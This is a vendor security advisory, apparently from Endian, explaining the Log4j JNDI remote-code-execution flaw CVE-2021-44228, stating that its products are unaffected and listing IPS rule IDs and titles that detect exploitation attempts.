Follow

Apache Log4j Vulnerability (CVE-2021-44228)

NVD (National Vulnerability Database) Reference


Background

Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.

In all Log4j versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.

Endian Impact

No Endian products or services are directly impacted by this vulnerability.

Endian Detection & Protection Capabilities

The most current version of the Endian IPS ruleset (dated Dec. 12, 2021) contains the following rules that can be applied to provide protection against the vulnerability:

Rule SID
Rules Category
Rule Description
2034661 emerging-info ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)
2034662 emerging-info ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)
2034663 emerging-info ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)
2034664 emerging-info ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)
2034665 emerging-info ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)
2034666 emerging-info ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)
2034670 emerging-attack_response ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain

Conclusion

Endian will continue to monitor the situation and provide updates to this article to keep our customers as informed as possible.

Have more questions? Submit a request

Comments